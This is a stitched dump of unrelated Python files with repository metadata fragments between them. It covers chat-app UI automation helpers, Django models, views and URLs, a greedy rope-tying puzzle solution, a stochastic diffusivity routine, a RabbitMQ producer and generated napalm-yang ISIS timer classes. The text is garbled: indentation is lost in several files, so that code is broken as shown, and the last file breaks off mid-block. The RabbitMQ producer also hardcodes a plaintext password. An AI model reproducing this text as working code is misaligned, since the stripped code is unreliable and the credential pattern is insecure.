    # Locator: ... - heat settings - bubble: click
    def RMSY_search_label_groupchat_menu_heatsetting_bubble_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_bubble)

    # Locator: ... - heat settings - vibration: click
    def RMSY_search_label_groupchat_menu_heatsetting_shock_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_shock)

    # Locator: ... - heat settings - ringtone: click
    def RMSY_search_label_groupchat_menu_heatsetting_bell_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_bell)

    # Locator: ... - heat settings - confirm: click
    def RMSY_search_label_groupchat_menu_heatsetting_confirm_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_confirm)

    # Locator: ... - heat settings - cycle: click
    def RMSY_search_label_groupchat_menu_heatsetting_period_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_period)

    # Locator: ... - heat settings - time slot: click
    def RMSY_search_label_groupchat_menu_heatsetting_time_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_menu__heatsetting_time)

    #********** [PAGE4] Contacts home - Search - tag list - enter group chat - group button: RMSY_search_label_groupchat_groupbtn **********
    # Locator: Contacts home - Search - tag list - enter group chat - group button - back: click
    def RMSY_search_label_groupchat_groupbtn_back_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_groupbtn_back)

    # Locator: ... - group button - contact list: click
    def RMSY_search_label_groupchat_groupbtn_Contacts_click(self, n):
        return self.p.clicks(self.RMSY_search_label_groupchat_groupbtn_Contacts, n)

    # Locator: ... - group button - message input box: type
    def RMSY_search_label_groupchat_groupbtn_msginput_sendkeys(self, msg):
        return self.p.send_keys(self.RMSY_search_label_groupchat_groupbtn_msginput, msg)

    # Locator: ... - group button - message button: click
    def RMSY_search_label_groupchat_groupbtn_msgbtn_click(self):
        return self.p.click(self.RMSY_search_label_groupchat_groupbtn_msgbtn)

    #********** [PAGE3] Contacts home - tap contact - open main menu - heat settings - one-to-one chat - cycle: RMSY_contacts_menu_heatsetting_p2pconversation_period **********
    # Locator: Contacts home - tap contact - open main menu - heat settings - one-to-one chat - cycle - back: click
    def RMSY_contacts_menu_heatsetting_p2pconversation_period_back_click(self):
        return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_back)

    # Locator: ... - cycle - every day: click
    def RMSY_contacts_menu_heatsetting_p2pconversation_period_everyday_click(self):
        return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_everyday)

    # Locator: ... - cycle - workdays: click
    def RMSY_contacts_menu_heatsetting_p2pconversation_period_workday_click(self):
        return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_workday)

    # Locator: ... - cycle - holidays: click
    def RMSY_contacts_menu_heatsetting_p2pconversation_period_holiday_click(self):
        return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_holiday)

    # Locator: ... - cycle - pick a date: click
    def RMSY_contacts_menu_heatsetting_p2pconversation_period_selectday_click(self):
        return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_selectday)

    # Locator: ... - cycle - save: click
    def RMSY_contacts_menu_heatsetting_p2pconversation_period_save_click(self):
        return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_period_save)

    #********** [PAGE3] Contacts home - tap contact - open main menu - heat settings - one-to-one chat - time slot: RMSY_contacts_menu_heatsetting_p2pconversation_time **********
    # Locator: ... - time slot - confirm: click
    def RMSY_contacts_menu_heatsetting_p2pconversation_time_confirm_click(self):
        return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_time_confirm)

    # Locator: ... - time slot - cancel: click
    def RMSY_contacts_menu_heatsetting_p2pconversation_time_cancel_click(self):
        return self.p.click(self.RMSY_contacts_menu_heatsetting_p2pconversation_time_cancel)

    #********** [PAGE3] Contacts home - tap contact - message - heat settings - cycle: RMSY_contacts_msg_menu_heatsetting_period **********
    # Locator: Contacts home - tap contact - message - heat settings - cycle - back: click
    def RMSY_contacts_msg_menu_heatsetting_period_back_click(self):
        return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_back)

    # Locator: ... - cycle - every day: click
    def RMSY_contacts_msg_menu_heatsetting_period_everyday_click(self):
        return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_everyday)

    # Locator: ... - cycle - workdays: click
    def RMSY_contacts_msg_menu_heatsetting_period_workday_click(self):
        return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_workday)

    # Locator: ... - cycle - holidays: click
    def RMSY_contacts_msg_menu_heatsetting_period_holiday_click(self):
        return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_holiday)

    # Locator: ... - cycle - pick a date: click
    def RMSY_contacts_msg_menu_heatsetting_period_selectday_click(self):
        return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_selectday)

    # Locator: ... - cycle - save: click
    def RMSY_contacts_msg_menu_heatsetting_period_save_click(self):
        return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_period_save)

    #********** [PAGE4] Contacts home - tap contact - message - heat settings - time slot: RMSY_contacts_msg_menu_heatsetting_time **********
    # Locator: ... - time slot - confirm: click
    def RMSY_contacts_msg_menu_heatsetting_time_confirm_click(self):
        return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_time_confirm)

    # Locator: ... - time slot - cancel: click
    def RMSY_contacts_msg_menu_heatsetting_time_cancel_click(self):
        return self.p.click(self.RMSY_contacts_msg_menu_heatsetting_time_cancel)
"[email protected]"
] | |
# ====== file: /tube/models.py | repo: seiya0723/video_site_02 | license: none | author: seiya@asahina ======
from django.db import models
from django.utils import timezone
class Video(models.Model):
class Meta:
db_table = "video"
    title = models.CharField(verbose_name="Title", max_length=30)
    comment = models.CharField(verbose_name="Video description", max_length=2000)
    dt = models.DateTimeField(verbose_name="Posted date", default=timezone.now)
def __str__(self):
        return self.title
# ====== file: /sssionpro/manage.py | repo: maheswatapradhan/feedback | license: none | author: [email protected] ======
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sssionpro.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
# ====== file: /Algorithms and Data Structures Practice/LeetCode Questions/Greedy/TieRopes.py | repo: harman666666/Algorithms-Data-Structures-and-Design | license: none | author: [email protected] ======
'''
There are N ropes numbered from 0 to N − 1, whose lengths are given in an array A, lying on the floor in a line. For each I (0 ≤ I < N), the length of rope I on the line is A[I].
We say that two ropes I and I + 1 are adjacent. Two adjacent ropes can be tied together with a knot, and the length of the tied rope is the sum of lengths of both ropes. The resulting new rope can then be tied again.
For a given integer K, the goal is to tie the ropes in such a way that the number of ropes whose length is greater than or equal to K is maximal.
For example, consider K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
The ropes are shown in the figure below.
We can tie:
rope 1 with rope 2 to produce a rope of length A[1] + A[2] = 5;
rope 4 with rope 5 with rope 6 to produce a rope of length A[4] + A[5] + A[6] = 5.
After that, there will be three ropes whose lengths are greater than or equal to K = 4. It is not possible to produce four such ropes.
Write a function:
def solution(K, A)
that, given an integer K and a non-empty array A of N integers, returns the maximum number of ropes of length greater than or equal to K that can be created.
For example, given K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
the function should return 3, as explained above.
Write an efficient algorithm for the following assumptions:
N is an integer within the range [1..100,000];
K is an integer within the range [1..1,000,000,000];
each element of array A is an integer within the range [1..1,000,000,000].
'''
# you can write to stdout for debugging purposes, e.g.
# print("this is a debug message")
def solution(K, A):
    '''
    Greedy scan: grow a bundle of adjacent ropes until its total length
    reaches K, count it, then start a new bundle. A rope already >= K
    forms a bundle by itself. Greedy is optimal here because closing a
    bundle as early as possible leaves the most rope for later bundles.
    '''
    total = 0
    count = 0
    for length in A:
        if total + length >= K:
            count += 1
            total = 0
        else:
            total += length
    return count
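# Quick check against the example in the problem statement (expected 3):
#   assert solution(4, [1, 2, 3, 4, 1, 1, 3]) == 3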
# ====== file: /stochastic_diffusion/diffusivity_1d_xk.py | repo: tnakaicode/jburkardt-python | license: none | author: [email protected] ======
#! /usr/bin/env python3
#
def diffusivity_1d_xk ( dc0, m, omega, n, x ):
#*****************************************************************************80
#
## DIFFUSIVITY_1D_XK evaluates a 1D stochastic diffusivity function.
#
# Discussion:
#
# The 1D diffusion equation has the form
#
# - d/dx ( DC(X) Del U(X) ) = F(X)
#
# where DC(X) is a function called the diffusivity.
#
# In the stochastic version of the problem, the diffusivity function
# includes the influence of stochastic parameters:
#
# - d/dx ( DC(XOMEGA) d/dx U(X) ) = F(X).
#
# In this function, the domain is assumed to be the unit interval [0.1].
#
#
# For DC0 = 1 and F(X) = 0, with boundary conditions U(0:OMEGA) = 0,
# U(1OMEGA) = 1, the exact solution is
#
# If OMEGA ~= 0:
#
# U(XOMEGA) = log ( 1 + OMEGA * X ) / log ( 1 + OMEGA )
#
# If OMEGA = 0:
#
# U(XOMEGA) = X
#
# In the numerical experiments described in the paper, OMEGA was taken
# to be a random variable with a Beta, or Uniform, or Gaussian or
# Poisson or Binomial distribution.
#
# For the Gaussian and Poisson distributions, the positivity requirement could not
# be guaranteed, and the experiments were simply made with a "small"
# variance of 0.1.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 20 December 2009
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
# Parameters:
#
# Input, real DC0, the constant term in the expansion of the
# diffusion coefficient.
#
# Input, integer M, the number of stochastic parameters.
#
# Input, real OMEGA(M), the stochastic parameters.
#
# Input, integer N, the number of evaluation points.
#
# Input, real X(N), the point where the diffusion coefficient is to
# be evaluated.
#
# Output, real DC(N), the value of the diffusion coefficient at X.
#
import numpy as np
k = 0
w = 1.0
arg = np.zeros(n)
while ( k < m ):
if ( k < m ):
arg = arg + omega[k] * np.sin ( w * np.pi * x )
k = k + 1
if ( k < m ):
arg = arg + omega[k] * np.cos ( w * np.pi * x )
k = k + 1
w = w + 1.0
arg = np.exp ( - 0.125 ) * arg
dc = dc0 + np.exp ( arg )
return dc
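# In formula form, the loop above builds (a sketch, assuming m = 2*J terms):
#   arg(x) = exp(-1/8) * sum_{w=1..J} ( omega[2w-2]*sin(w*pi*x) + omega[2w-1]*cos(w*pi*x) )
#   dc(x)  = dc0 + exp(arg(x))
# so the field stays strictly positive for nonnegative dc0, as a diffusivity must.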
def diffusivity_1d_xk_contour ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_contour displays contour plots of a 1D stochastic diffusivity function.
#
# Discussion:
#
# The diffusivity function is compute by DIFFUSIVITY_1D_XK.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
import matplotlib.pyplot as plt
import numpy as np
print ( '' )
print ( 'diffusivity_1d_xk_contour' )
print ( ' Display the stochastic diffusivity function' )
print ( ' defined by DIFFUSIVITY_1D_XK.' )
#
# Set the spatial grid.
#
n = 51
x_min = -1.0
x_max = +1.0
x = np.linspace ( x_min, x_max, n )
#
# Sample the OMEGA values from a standard normal distribution.
#
m = 5
omega = np.random.randn ( m )
#
# Compute the diffusivity field.
#
dc0 = 10.0
dc = diffusivity_1d_xk ( dc0, m, omega, n, x )
#
# Plot the diffusivity field.
#
plt.plot ( x, dc, linewidth = 2 )
plt.grid ( True )
plt.xlabel ( '<--- X --->' )
plt.ylabel ( 'DC(X)' )
plt.title ( 'XK Stochastic diffusivity function' )
filename = 'diffusivity_1d_xk.png'
plt.savefig ( filename )
print ( '' )
print ( ' Graphics saved as "%s".' % ( filename ) )
return
def diffusivity_1d_xk_test ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_test tests diffusivity_1d_xk.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# None
#
import platform
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Python version: %s' % ( platform.python_version ( ) ) )
print ( ' Test diffusivity_1d_xk.' )
diffusivity_1d_xk_contour ( )
#
# Terminate.
#
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Normal end of execution.' )
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
diffusivity_1d_xk_test ( )
timestamp ( )
# ====== file: /setup.py | repo: mvexel/whathappened | license: Apache-2.0 | author: [email protected] ======
from setuptools import setup
setup(
name='whathappened',
packages=['whathappened'],
include_package_data=True,
install_requires=[
'flask',
'requests',
'gunicorn==19.7.0'
],
)
# ====== file: /src/apps/authentication/views.py | repo: snicoper/django-boilerplate | license: MIT | author: [email protected] ======
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import get_user_model, views
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.sites.shortcuts import get_current_site
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse, reverse_lazy
from django.utils.translation import ugettext as _
from django.views import generic
from utils.http import get_full_path
from utils.mail import send_templated_mail
from utils.mixins.views import AnonymousRequiredMixin
from .forms import AuthenticationForm, RegisterUserForm, UserEmailUpdateForm
from .models import RegisterUser, UserEmailUpdate
UserModel = get_user_model()
class RegisterUserFormView(AnonymousRequiredMixin, generic.CreateView):
template_name = 'authentication/register.html'
form_class = RegisterUserForm
model = RegisterUser
def __init__(self, *args, **kwargs):
"""Elimina posibles usuarios expirados."""
RegisterUser.objects.delete_expired_users_temp()
super().__init__(*args, **kwargs)
def get_success_url(self):
"""Si todo OK, envía el email para verificación y redirecciona."""
self._send_email_with_token()
return reverse('authentication:success')
def _send_email_with_token(self):
"""Envía un email con token para terminar proceso de registro."""
current_site = get_current_site(self.request)
site_name = current_site.name
url_validate_token = get_full_path(
self.request,
'authentication:validate_token',
token=self.object.token
)
context = {
'username': self.object.username,
'email': self.object.email,
'site_name': site_name,
'url_validate_token': url_validate_token
}
send_templated_mail(
subject=_(f'Validación de email en {site_name}'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[self.object.email],
context=context,
template_text='authentication/emails/register_success.txt'
)
class RegisterUserSuccessView(AnonymousRequiredMixin, generic.TemplateView):
template_name = 'authentication/success.html'
class RegisterUserValidateTokenView(AnonymousRequiredMixin, generic.TemplateView):
"""Validación email de un nuevo registro a través del token."""
template_name = 'authentication/validate_token.html'
def get(self, request, *args, **kwargs):
RegisterUser.objects.delete_expired_users_temp()
token = self.kwargs.get('token')
try:
user_temp = RegisterUser.objects.get(token=token)
except RegisterUser.DoesNotExist:
return render(request, 'authentication/token_not_exists.html')
RegisterUser.objects.move_user_tmp_to_users(UserModel, user_temp)
messages.success(request, _('El registro se ha completado con éxito'))
return redirect(reverse('authentication:login'))
class LoginView(AnonymousRequiredMixin, views.LoginView):
template_name = 'authentication/login.html'
form_class = AuthenticationForm
class LogoutView(LoginRequiredMixin, views.LogoutView):
template_name = 'authentication/logged_out.html'
class PasswordResetView(AnonymousRequiredMixin, views.PasswordResetView):
template_name = 'authentication/password_reset_form.html'
email_template_name = 'authentication/emails/password_reset_email.html'
subject_template_name = 'authentication/emails/password_reset_subject.txt'
success_url = reverse_lazy('authentication:password_reset_done')
class PasswordResetDoneView(AnonymousRequiredMixin, views.PasswordResetDoneView):
template_name = 'authentication/password_reset_done.html'
class PasswordResetConfirmView(AnonymousRequiredMixin, views.PasswordResetConfirmView):
template_name = 'authentication/password_reset_confirm.html'
success_url = reverse_lazy('authentication:password_reset_complete')
class PasswordResetCompleteView(AnonymousRequiredMixin, views.PasswordResetCompleteView):
template_name = 'authentication/password_reset_complete.html'
class PasswordChangeView(views.PasswordChangeView):
template_name = 'authentication/password_change_form.html'
success_url = reverse_lazy('authentication:password_change_done')
class PasswordChangeDoneView(views.PasswordChangeDoneView):
template_name = 'authentication/password_change_done.html'
class UserEmailUpdateView(LoginRequiredMixin, generic.FormView):
template_name = 'authentication/email_update.html'
form_class = UserEmailUpdateForm
model = UserEmailUpdate
def get_initial(self):
"""Establece datos en los campos del form."""
initial = super().get_initial()
initial['user'] = self.request.user.id
initial['token'] = UserEmailUpdate.objects.generate_unique_token()
initial['new_email'] = self.request.user.email
return initial
def form_valid(self, form):
"""Envía el email de confirmación."""
new_email = form.cleaned_data['new_email']
token = form.cleaned_data['token']
UserEmailUpdate.objects.update_or_create(
defaults={'new_email': new_email, 'token': token},
user=self.request.user
)
self._send_confirm_email_for_validate(token, new_email)
return super().form_valid(form)
def get_success_url(self):
msg = _('Se ha enviado un email a la nueva dirección para la confirmación')
messages.success(self.request, msg)
return reverse('accounts:profile')
def _send_confirm_email_for_validate(self, token, new_email):
"""Envía un email para la confirmación del nuevo email con un token."""
current_site = get_current_site(self.request)
url_validate_token = get_full_path(
self.request,
'authentication:email_update_validate',
token=token
)
context = {
'url_validate_token': url_validate_token,
'site_name': current_site.name
}
send_templated_mail(
subject=_('Confirmación cambio de email'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[new_email],
context=context,
template_text='authentication/emails/email_update_confirm.txt'
)
class UserEmailUpdateValidateView(LoginRequiredMixin, generic.View):
"""Verifica el token de cambio de email.
Para mayor seguridad, el usuario ha de estar logueado.
Una vez comprobado y actualizado el nuevo email, elimina el
email temporal.
"""
def get(self, request, *args, **kwargs):
"""Comprueba el token que coincida."""
token = kwargs.get('token')
try:
email_update = UserEmailUpdate.objects.get(token=token, user=request.user)
except UserEmailUpdate.DoesNotExist:
return redirect('authentication:token_email_not_exists')
self.request.user.email = email_update.new_email
self.request.user.save()
email_update.delete()
messages.success(request, _('Se ha actualizado el email'))
return redirect(reverse('accounts:profile'))
class UserEmailUpdateNotFoundView(generic.TemplateView):
"""El token no existe o no pertenece al usuario."""
template_name = 'authentication/token_email_not_exists.html'
class UserRemoveEmailUpdateView(generic.View):
"""Eliminar un email no confirmado por parte del usuario."""
def post(self, request, *args, **kwargs):
get_object_or_404(UserEmailUpdate, user=request.user).delete()
messages.success(request, _('Email eliminado con éxito'))
return redirect(reverse('accounts:profile'))
# ====== file: /listings/urls.py | repo: nimadorostkar/Django-Real-Estate | license: none | author: [email protected] ======
from django.urls import path
from .views import (ListingListView, ListingDetailView, search)
urlpatterns = [
path('', ListingListView.as_view(), name='listings'),
path('<int:pk>', ListingDetailView.as_view(), name='listing'),
path('search', search, name='search'),
]
# ====== file: /122 rabbitmq/producer.py | repo: yyq1609/Python_road | license: none | author: [email protected] ======
import pika
credentials = pika.PlainCredentials('echo', '123')
connection = pika.BlockingConnection(pika.ConnectionParameters('172.16.44.142', virtual_host='vhost1', credentials=credentials))
channel = connection.channel()
channel.queue_declare(queue='test', durable=True)
channel.basic_publish(exchange='',
routing_key='test',
body='One order here!',
properties=pika.BasicProperties(delivery_mode=2),
)
print('Order placed successfully')
connection.close() | [
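# durable=True plus delivery_mode=2 asks RabbitMQ to persist both the queue
# and the message across broker restarts. A matching consumer sketch
# (pika 1.x API; `handler` is a hypothetical callback):
#   channel.basic_consume(queue='test', on_message_callback=handler)
#   channel.start_consuming()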
"[email protected]"
] | |
ab0b4cfbf9f72161aa117b1b37987e52089b9254 | adea9fc9697f5201f4cb215571025b0493e96b25 | /napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/global_/timers/spf/__init__.py | 1f2406bbde92beb73269b6ba92ec5145b67db728 | [
"Apache-2.0"
] | permissive | andyjsharp/napalm-yang | d8a8b51896ef7c6490f011fe265db46f63f54248 | ef80ebbfb50e188f09486380c88b058db673c896 | refs/heads/develop | 2021-09-09T02:09:36.151629 | 2018-03-08T22:44:04 | 2018-03-08T22:44:04 | 114,273,455 | 0 | 0 | null | 2018-03-08T22:44:05 | 2017-12-14T16:33:35 | Python | UTF-8 | Python | false | false | 14,778 | py |
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
unicode = str
elif six.PY2:
import __builtin__
from . import config
from . import state
class spf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timer settings.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_extmethods', '__config','__state',)
_yang_name = 'spf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'network-instances', u'network-instance', u'protocols', u'protocol', u'isis', u'global', u'timers', u'spf']
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
YANG Description: This container defines ISIS SPF timers configuration.
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: This container defines ISIS SPF timers configuration.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__config = t
if hasattr(self, '_set'):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
YANG Description: This container defines state information for ISIS SPF timers.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container defines state information for ISIS SPF timers.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """state must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
_pyangbind_elements = {'config': config, 'state': state, }
from . import config
from . import state
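# A second 'spf' class follows, generated from the openconfig-network-instance-l2
# YANG module (per its docstring); being defined later, it rebinds the name at import time.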
class spf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timer settings.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_extmethods', '__config','__state',)
_yang_name = 'spf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'network-instances', u'network-instance', u'protocols', u'protocol', u'isis', u'global', u'timers', u'spf']
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
YANG Description: This container defines ISIS SPF timers configuration.
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: This container defines ISIS SPF timers configuration.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__config = t
if hasattr(self, '_set'):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
YANG Description: This container defines state information for ISIS SPF timers.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container defines state information for ISIS SPF timers.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
